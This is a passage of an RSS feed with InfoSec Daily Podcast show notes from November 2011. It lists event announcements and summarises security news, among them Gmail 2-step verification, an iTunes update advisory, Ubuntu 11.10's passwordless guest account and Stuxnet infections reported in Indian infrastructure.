	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AT&amp;T, the largest phone company in the world, has 100.7 million wireless subscribers, yet only 1 percent of them, approximately one million customers, were targeted by the attack, in which hackers used automated scripts to &nbsp;try to match up customers telephone numbers with account numbers and gain access to accounts.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-529-friendly-google-psa-itunes-mitm-ciq-and-desist-banned-scanners-att/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3188/0/infosec-daily-podcast-episode-529.mp3" length="18104255" type="audio/mpeg" />
		<itunes:duration>0:37:40</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 529 for November 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to all[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 529 for November 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &#160;Dr. Bonez will have his weekend show on 11/26. &#160;The normal show will return on 11/28.
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://mashable.com/2011/11/22/google-2-step-verification-gmail/
	Did you know that Google offers 2-step login verification for Gmail accounts? The feature has been around a while, and now Google has written a reminder for all users who need an extra layer of security for their Gmail account and other services connected to it.
	In addition to logging into Gmail with your email and password, with 2-step verification you&#8217;ll have to go through the added trouble of entering a code Google will send to your phone. This will &#8220;approve&#8221; the computer you&#8217;re currently logging in from for 30 days, so you don&#8217;t have to do this every time you log in.
	If you have a smartphone, you can also generate the code on your phone using the Google Authenticator app.
	Yes, entering an additional code is somewhat of a nuisance, but it would also greatly complicate matters for anyone who has gotten a hold of your password. To successfully log into your Gmail account, that person would also need to obtain your phone.
	In its blog post, Google emphasizes that this reminder is just &#8220;general security advice, not an indication of an attack or compromise,&#8221; but one has to wonder if the Redmond giant is seeing an increased number of complaints from users whose Gmail accounts have been compromised.
	To enable 2-step verification for Gmail, go here. 
	Source: https://support.apple.com/kb/HT5030
	Available for: Mac OS X v10.5 or later, Windows 7, Vista, XP SP2 or later
	Impact: A man-in-the-middle attacker may offer software that appears to originate from Apple
	Description: iTunes periodically checks for software updates using an HTTP request to Apple. This request may cause iTunes to indicate that an update is available. If Apple Software Update for Windows is not installed, clicking the Download iTunes button may open the URL from the HTTP response in the user&#39;s default browser. This issue has been mitigated by using a secured connection when checking for available updates. For OS X systems, the user&#39;s default browser is not used because Apple[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 528 &#8211; GPS Hostage Situation, HD Moore&#8217;s Law, Oneiric Ocelot, Indian SCADA &amp; Facebook</title>
		<link>http://www.isdpodcast.com/episode-528-gps-hostage-situation-hd-moores-law-oneiric-ocelot-indian-scada-facebook</link>
		<comments>http://www.isdpodcast.com/episode-528-gps-hostage-situation-hd-moores-law-oneiric-ocelot-indian-scada-facebook#comments</comments>
		<pubDate>Tue, 22 Nov 2011 02:04:56 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3179</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 528 for November 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: No Show on Thursday (11/24) or Friday (11/25). &#160; In order to allow our hosts to enjoy the Holiday and spend time with their families we will [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 528 for November 21, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:<br class="kix-line-break" /><br />
	No Show on Thursday (11/24) or Friday (11/25). &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order to allow our hosts to enjoy the Holiday and spend time with their families we will </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">not</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> have any shows on Thursday (11/24) or Friday (11/25). &nbsp;Dr. Bonez will have his weekend show on 11/26. &nbsp;The normal show will return on 11/28.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to </span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.stripes.com/gunman-barricaded-in-building-at-colorado-air-base-1.161338"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.stripes.com/gunman-barricaded-in-building-at-colorado-air-base-1.161338</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An airman armed with a pistol barricaded himself in a building at an Air Force base in Colorado that controls all GPS satellites, but operations haven&#39;t been disrupted, officials said Monday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The building was evacuated, and no shots were fired and no one was injured, said Schriever Air Force Base spokeswoman Jennifer Thibault.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A negotiator and a SWAT team from the El Paso County Sheriff&#39;s Department were on scene at the Air Force&#39;s request, said Air Force Lt. Marie Denson.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thibault said the airman is a member of a security squadron and is armed with his own handgun. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials were investigating how he got the weapon past security and onto the base.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The airman is in a building where personnel prepare for deployments, Thibault said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Control rooms for GPS and other military satellites are in a separate, heavily protected inner compound surrounded by fences and staffed with armed guards.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The gunman faces a discharge over a matter in civilian court, but no other details were available, Denson said. He is still classified as being on active duty, she said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The airman&#39;s name, rank and service history weren&#39;t immediately released.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The base about 60 miles south of Denver controls more than 60 military satellites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://community.rapid7.com/community/metasploit/blog/2011/11/21/hd-moores-law"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://community.rapid7.com/community/metasploit/blog/2011/11/21/hd-moores-law</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At Metricon6 and later on his blog</span><a href="http://cognitivedissidents.wordpress.com/2011/11/01/intro-to-hdmoores-law/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Cognitive Dissidents</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Joshua Corman presented his latest discovery &#8211; HD Moore&#39;s Law:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Casual Attacker power grows at the rate of Metasploit&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HD Moore created the Metasploit Project in 2003 to provide the security community with a public resource for exploit development. This project resulted in the Metasploit Framework, an open source platform for writing security tools and exploits.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Metasploit Framework took away some of the &quot;black magic&quot; components of hacking, making it accessible to network admins and security professionals with &quot;lesser powers&quot; to run typical hacking attacks against their own network to see if the network is vulnerable. They could then use these findings to remediate any security issues they found. This is still true today.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the same time, this commoditization of exploit tools made it easier for a casual attacker to exploit other people&#39;s network, and this is where Joshua Corman&#39;s comment comes in: If you can breach your own network, then someone else can too. Because Metasploit is the industry&#39;s leading penetration testing tool with about 120,000 users, it is both the best way to test your network&#39;s security and also the most likely vector of attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.infosecisland.com/blogview/18268-Ubuntu-Decreases-Security-and-Calls-it-a-Feature.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/18268-Ubuntu-Decreases-Security-and-Calls-it-a-Feature.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you played with the latest version of Ubuntu yet? Ubuntu 11.10 named Oneiric Ocelot (Who makes up these names?), was released last month and comes with a couple surprises.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When you boot it up, you will see two differences. First of all, the standard Gnome Desktop is not installed by default. Unity, which was an option in 11.04, is now the standard desktop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unity is a graphical interface that makes your system look more like the latest fad tablet Operating Systems. I hated it at first, but it has grown on me.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t like it? No worries, you can install the classic gnome interface with the following command:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">sudo apt-get install gnome-panel</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the second addition is the most concerning. If you look at the user list there is a new user present &ndash; &ldquo;Guest Session&rdquo;. There is no security on this account. Just select &ldquo;Guest Session&rdquo;, leave the password blank and log in!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Okay, I know, you need to be an admin to be able to run anything potentially damaging. If you log into the Guest account and try to run a system command you get &ldquo;Permission Denied&rdquo;. And you still need the root password to install software and execute the &lsquo;SUDO&rsquo; command.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So what is the problem?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is an opening, a small crack. And where there is a crack, there is an opportunity for exploit. Microsoft learned this lesson years ago and has since disabled the Guest account by default.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Why would Ubuntu do this?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The Guest account is not really a problem, and it&rsquo;s been there a long time, it&rsquo;s just that it&rsquo;s a bit more obvious now that it&rsquo;s listed in the login screen.&rdquo;, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mentions an Ubuntu team member in a</span><a href="https://answers.launchpad.net/ubuntu/+source/lightdm/+question/175756"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">support forum</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Luckily he also mentions how to disable it, because the user does not show up in the user list!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">You can disable the guest account (in 11.10 only) by editing the /etc/lightdm/lightdm.conf and add the line:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">allow-guest=false</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">You will need to reboot for this to take effect.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When I first heard about this, I updated one of my Ubuntu 11.04 systems to 11.10 to see if this was true. Sure enough, after the update was complete and the system rebooted &ndash; I had a &ldquo;Guest Session&rdquo; account. I did not have any guest users enabled on my system before.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t get me wrong, I love Ubuntu, am an avid user and highly recommend it. But enabling users with no passwords by default? Call it a feature I guess?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tehelka.com/story_main51.asp?filename=Ne261111India.asp"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tehelka.com/story_main51.asp?filename=Ne261111India.asp</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the Stuxnet cyber attack temporarily took down the Iranian nuclear facility at Natanz in 2010, it made few waves in India. However, shocking details have now emerged that barely a few months after the computer worm created problems in Iran, critical infrastructure in India too was infected by the tactical cyber weapon developed in Israeli laboratories.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In June 2010, ONGC oil rigs using SCADA (Supervisory Control and Data Acquisition) industrial systems were found to be infected by the same worm. The oil major, whose control systems are run by ABB, didn&rsquo;t face an immediate threat because the worm was programmed to target Siemens systems. However, with 247 onshore production facilities, 11 offshore processing complexes, 74 drilling rigs and 7,000 wells, all run by a centralised control system, an attack could have taken out India&rsquo;s entire oil production for days, if not weeks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just a few weeks after that shocking discovery, Indian investigators also stumbled upon massive infections in a mega power project in Gujarat using SCADA systems controlling the generation and transmission network in western India. Investigators pieced together the evidence and launched a probe into other vulnerable systems that revealed facts that were too sensitive and complex to be made public. They discovered that the same attack was perfectly capable of knocking off signal and control systems on Delhi Metro&rsquo;s crucial links, throwing the capital&rsquo;s most used public transport system into chaos.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier, cyber security investigative researcher Jeffrey Karr had shocked ISRO when he proved that India&rsquo;s INSAT 4B satellite was taken down by Stuxnet to serve Chinese business interests. On 7 July 2010, INSAT 4B&rsquo;s power glitch forced India&rsquo;s leading DTH providers such as Sun Direct, Doordarshan and Tata Teleservices to shift to ASIASAT-5, a satellite owned by the Chinese government. INSAT 4B was using the same Siemens software that was responsible for activating Stuxnet to make the Iranian nuclear facility go haywire.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
